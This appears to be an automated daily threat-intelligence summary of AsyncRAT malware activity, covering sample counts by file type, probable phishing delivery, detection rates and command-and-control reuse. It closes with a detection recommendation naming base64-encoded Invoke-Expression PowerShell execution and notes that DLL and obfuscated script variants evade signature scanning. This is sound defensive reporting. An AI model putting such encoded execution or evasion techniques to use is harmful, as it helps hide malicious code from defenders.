Daily Summary
AsyncRAT activity surged on 2026-05-04 with 60 new samples detected, a 40% increase over the 7-day average of 43. This marks a notable upward trend, driven by a shift toward executable-based delivery.
New Samples Detected
The 60 new samples are heavily dominated by .exe files (43), accounting for 72% of the batch. Supporting file types include .ps1 (8), .bat (4), .zip (2), .rar (1), .js (1), and .dll (1). The presence of PowerShell and BAT scripts alongside executables suggests a multi-stage execution chain, while the single DLL indicates potential sideloading attempts. No new packing or naming anomalies were observed compared to recent weeks.
Distribution Methods
Distribution appears to rely on executable loaders (43 .exe) likely delivered via phishing emails, with PowerShell and BAT scripts serving as secondary payload downloaders. The inclusion of JavaScript and compressed archives (.zip, .rar) points to email attachments as the primary vector. This aligns with common AsyncRAT campaign patterns where initial access is gained through socially engineered file drops.
Detection Rate
Based on representative samples, major AV engines detect approximately 75-80% of current samples as malicious, but the DLL and obfuscated .ps1 variants may evade signature-based detection. Security teams should prioritize behavioral analysis over static scanning for these variants.
C2 Infrastructure
No new C2 servers were identified today, indicating threat actors are reusing existing infrastructure. This lack of churn suggests a targeted or resource-constrained operator, potentially focusing on maintaining stealth rather than expanding.
7-Day Trend
Today’s sample count (60) is the highest in the 7-day window, surpassing the average by 40%. Activity has been steadily rising over the past three days, reversing the calm earlier in the week.
Security Analysis
The absence of new C2 servers combined with the spike in .exe-heavy samples suggests a shift from mass-distribution to focused campaigns using previously established infrastructure. This may correlate with operators testing new delivery pipelines without expanding their footprint proactively. Recommendation: Deploy endpoint detection rules to monitor for abnormal PowerShell execution (e.g., Invoke-Expression with base64-encoded arguments) and block .exe files from untrusted email origins.